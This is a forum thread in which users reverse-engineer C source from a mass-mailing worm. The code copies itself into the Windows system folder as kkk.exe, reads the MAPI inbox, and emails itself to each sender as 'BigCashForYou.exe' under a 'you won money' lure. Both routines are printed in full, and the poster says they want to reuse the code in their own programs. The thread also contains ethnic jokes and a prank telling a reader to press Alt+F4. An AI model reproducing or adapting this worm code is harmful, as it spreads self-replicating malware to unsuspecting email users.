User Controls
What does this C code do?
-
2017-07-25 at 1:32 AM UTCRepost from https://niggasin.space/thread/14950 because i realized byzantine thread titles are not conducive to discussion.
#include <windows.h>
#include <mapi.h>
/* MAPI mailing routine */
DWORD WINAPI MailMySelf(LPVOID Data)
{
/* Variables and pointers to MAPI functions */
CHAR rgchMsgID[513];
MapiMessage *lpMessage;
HINSTANCE hi;
LPMAPILOGON MAPILogon;
LPMAPIFINDNEXT MAPIFindNext;
LPMAPIREADMAIL MAPIReadMail;
LPMAPISENDMAIL MAPISendMail;
LPMAPILOGOFF MAPILogoff;
LHANDLE lhSession;
char dropper[MAX_PATH];
char MyPath[MAX_PATH];
if(!(hi = LoadLibrary( "mapi32.dll" )))
{
/* Fail to load mapi */
return;
}
/* Get mapi functions */
MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");
MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");
MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");
MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");
MAPILogoff = (LPMAPILOGOFF)GetProcAddress(hi,"MAPILogoff");
/* Check them */
if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL ||
MAPISendMail == NULL || MAPILogoff == NULL)
{
/* No MAPI functions :( */
return;
}
/* Copy to dropper */
GetModuleFileName(NULL,MyPath,MAX_PATH);
GetSystemDirectory(dropper,MAX_PATH);
strcat(dropper,"\\kkk.exe");
CopyFile(MyPath,dropper,FALSE);
/* Ok !, try to login */
if(MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
{
*rgchMsgID = NULL;
while(1)
{
if(MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
{
break;
}
/* Read mail */
if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
{
/* Send ! */
SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,
lhSession,dropper);
}
}
MAPILogoff( lhSession, 0L, 0L, 0L);
}
FreeLibrary(hi);
} -
2017-07-25 at 2:03 AM UTCSome kind of win32 wank. Looks like it tried to log in to a MAPI session with default credentials and then forward every message to, uhh, I guess it dumps them into some directory? Not really sure, the SendMail function near the end there doesn't appear to be part of the win32 api nor is it defined in that file so it's hard to say exactly how it works. I mean presumably it sends mail but I can't find any docs on what the args are.
-
2017-07-25 at 2:09 AM UTCit's only a module from a larger program, but:
the first part is just testing to make sure the messaging API (basic email functionality) is available and functioning.
This part first gets the path of the application and stores it in MyPath.
It then generates the location of the system folder and adds 'kkk.exe to the end (ie. c:\windows\kkk.exe) and stores it in 'dropper'.
The last part copies the current application into the path specified in dropper.
GetModuleFileName(NULL,MyPath,MAX_PATH);
GetSystemDirectory(dropper,MAX_PATH);
strcat(dropper,"\\kkk.exe");
CopyFile(MyPath,dropper,FALSE);
The rest is related to sending an email, important part is:
SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)
See MAPI::SendMail reference: link
It's basically sending the path of the copied dropper file (c:\windows\kkk.exe), but I'm not familiar with the MAPI so I don't know who to.
lpMessage->lpOriginator->lpszAddress should indicate the target recipient, and that could either mean to send to itself or to an address that's specified somewhere else in the code -
2017-07-25 at 2:12 AM UTCDo Hispanics code in Si?
-
2017-07-25 at 2:13 AM UTCthey mexicode
-
2017-07-25 at 2:15 AM UTCTacode
-
2017-07-25 at 2:15 AM UTC***actually I'm not certain it's using email because I can't work out the destination; MAPI apparently has the capability to handle both email and DCOM messaging
-
2017-07-25 at 2:20 AM UTC
Originally posted by aldra it's only a module from a larger program, but:
the first part is just testing to make sure the messaging API (basic email functionality) is available and functioning.
This part first gets the path of the application and stores it in MyPath.
It then generates the location of the system folder and adds 'kkk.exe to the end (ie. c:\windows\kkk.exe) and stores it in 'dropper'.
The last part copies the current application into the path specified in dropper.
GetModuleFileName(NULL,MyPath,MAX_PATH);
GetSystemDirectory(dropper,MAX_PATH);
strcat(dropper,"\\kkk.exe");
CopyFile(MyPath,dropper,FALSE);
The rest is related to sending an email, important part is:
SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)
See MAPI::SendMail reference: link
It's basically sending the path of the copied dropper file (c:\windows\kkk.exe), but I'm not familiar with the MAPI so I don't know who to.
lpMessage->lpOriginator->lpszAddress should indicate the target recipient, and that could either mean to send to itself or to an address that's specified somewhere else in the code
Like i mentioned in my original thread i reckoned this was part of a worm type of behavioral routine. It comes from a malware originally, if you'd like i can post all the source here but that's a lot of code and a functional malware, lel.
Sounds plausible? Because if so, i need to use renki-jutsu to transmute this into something i can use with my own programs, preferably in Python. -
2017-07-25 at 2:20 AM UTC
Originally posted by aldra ***actually I'm not certain it's using email because I can't work out the destination; MAPI apparently has the capability to handle both email and DCOM messaging
Correct, MAPI is a COM object on it's own as well. So the question is, can you transfer arbitrary data with MAPI? -
2017-07-25 at 2:23 AM UTC
Originally posted by Sophie Like i mentioned in my original thread i reckoned this was part of a worm type of behavioral routine. It comes from a malware originally, if you'd like i can post all the source here but that's a lot of code and a functional malware, lel.
Sounds plausible? Because if so, i need to use renki-jutsu to transmute this into something i can use with my own programs, preferably in Python.
SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)
That's the line that actually sends the message; the content of the message is the variable 'dropper'. As per the the first section, 'dropper' only contains the path of the malware, not the actual content, so if this is used to spread it then it would require another component that receives the message and retrieves the malware from the given path. -
2017-07-25 at 2:25 AM UTC
Originally posted by aldra
SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,lhSession,dropper)
That's the line that actually sends the message; the content of the message is the variable 'dropper'. As per the the first section, 'dropper' only contains the path of the malware, not the actual content, so if this is used to spread it then it would require another component that receives the message and retrieves the malware from the given path.
Lemme CTRL+F dropper real quick. -
2017-07-25 at 2:29 AM UTCOh i found this too, this seems to be related to what i posted originally.
/* This it the function that sends e-mail */
void SendMail(char *addr,LPMAPISENDMAIL SnM,LHANDLE lhSession,char *VirPath) {
/* build mail */
MapiRecipDesc *recips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
MapiFileDesc attachment = { 0, 0, (ULONG)-1,VirPath,"BigCashForYou.exe", NULL};
MapiMessage note = { 0, "You are a very lucky man, read this mail!",
"Hi, you won a big amount of money!!! If you want to know more look at the attachment!", NULL,
NULL, NULL, 0, NULL,1, recips, 1, &attachment};
recips->ulReserved = 0;
recips->ulRecipClass = MAPI_TO;
recips->lpszName = addr;
recips->lpszAddress = addr;
recips->ulEIDSize = 0;
recips->lpEntryID = NULL;
/* Send ! */
SnM(lhSession, 0L, ¬e, 0L, 0L);
/* free memory */
free(recips);
}
EDIT: I am not paying enough attention to this, lel. Updated the code -
2017-07-25 at 2:32 AM UTCLmao @ "You are a very lucky man, read this mail!" typical spam opening. I gather the intention is to mail itself places.
-
2017-07-25 at 2:37 AM UTC
Originally posted by Sophie Oh i found this too, this seems to be related to what i posted originally.
/* This it the function that sends e-mail */
void SendMail(char *addr,LPMAPISENDMAIL SnM,LHANDLE lhSession,char *VirPath) {
/* build mail */
MapiRecipDesc *recips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
MapiFileDesc attachment = { 0, 0, (ULONG)-1,VirPath,"BigCashForYou.exe", NULL};
MapiMessage note = { 0, "You are a very lucky man, read this mail!",
"Hi, you won a big amount of money!!! If you want to know more look at the attachment!", NULL,
NULL, NULL, 0, NULL,1, recips, 1, &attachment};
recips->ulReserved = 0;
recips->ulRecipClass = MAPI_TO;
recips->lpszName = addr;
recips->lpszAddress = addr;
recips->ulEIDSize = 0;
recips->lpEntryID = NULL;
/* Send ! */
SnM(lhSession, 0L, ¬e, 0L, 0L);
/* free memory */
free(recips);
}
EDIT: I am not paying enough attention to this, lel. Updated the code
lol ok, they have their own SendMail function, not using the default API.
You're right - the previous code passes the 'dropper' path to SendMail(), which then gets the file and adds it as an attachment to the outbound email. -
2017-07-25 at 2:43 AM UTCMystery solved! Thank you for your participation everyone! Next week we will do some more community reversing.
-
2017-07-25 at 3 AM UTCJust hit alt f4 and it will bring up debugging linux proxy.
-
2017-07-25 at 3:04 AM UTC
-
2017-07-25 at 3:09 AM UTCI bet you did it and that's why you're salty.
-
2017-07-25 at 3:12 AM UTC
-
2017-07-25 at 3:16 AM UTCIt was just a joke brah, i'm not insulting your intelligence, I'm just bored.
